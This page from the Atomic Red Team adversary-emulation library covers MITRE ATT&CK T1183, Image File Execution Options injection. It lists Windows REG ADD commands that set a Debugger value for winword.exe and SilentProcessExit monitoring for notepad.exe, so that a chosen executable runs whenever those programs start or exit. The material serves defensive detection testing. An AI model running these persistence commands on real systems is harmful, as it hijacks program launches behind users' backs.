security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
7ef84e481520133a2cf394ecd4a3fb70ddb140bc
atomic-red-team/Windows/Persistence/Image_File_Execution_Options_Injection.md
T
api0cradle 92ab19d773 Created T1191 and T1183, added technique to T1060
2018-04-17 11:58:38 +02:00

691 B
Raw Blame History

Image File Execution Options

MITRE ATT&CK Technique: T1183

Debugger

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe" /v Debugger /d "C:\folder\AtomicRedTeam.exe"

GlobalFlags

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\folder\AtomicRedTeam.exe"

Reference in New Issue View Git Blame Copy Permalink